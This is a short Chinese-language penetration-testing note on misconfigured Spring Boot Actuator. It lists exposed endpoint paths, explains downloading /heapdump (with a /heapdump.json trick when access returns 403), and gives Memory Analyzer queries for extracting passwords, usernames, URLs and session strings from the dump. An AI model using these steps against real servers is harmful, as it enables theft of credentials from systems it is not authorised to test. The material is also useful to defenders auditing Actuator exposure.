0x01. 基本知识

  1. 在pom.xml里面有这样的配置

<dependency>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-actuator</artifactId>
   <exclusions>
  1. 没有开启安全设置
management:
  security:
    enabled: false
  health:
    elasticsearch:
      enabled: false
  metrics:
    export:
      prometheus:
        enabled: true
      jmx:
        enabled: true
  endpoints:
    web:
      exposure:
        include: '*'
      base-path: /auto

服务端可以通过修改配置文件来改变Actuator的根路径:management.endpoints.web.base-path=/monitor

搜索github的源代码,可以看到类似的设置:

0x02 漏洞利用

在配置不当的时候,可能暴露以下路由:

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream

可以通过/heapdump这个节点获取内存,然后使用Memory Analyzer分析内存,获取敏感信息,常用查询:

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
或
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
 
 
select* from java.util.Hashtable$Entry x WHERE(toString(x.key).contains("username"))
select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("url"))
select* from java.lang.String s WHERE toString(s) LIKE ".*password.*"
select* from org.springframework.web.context.support.StandardServletEnvironment
select* from java.lang.String s WHERE toString(s) LIKE ".*SESSION.*"

注意点

  • 参考链接里面,当下载/heapdump是403的时候, /heapdump.json可以下载成功,这个在spring启动的时候可以看到路由,所有的节点信息都存在.json路径

参考链接

⬆︎TOP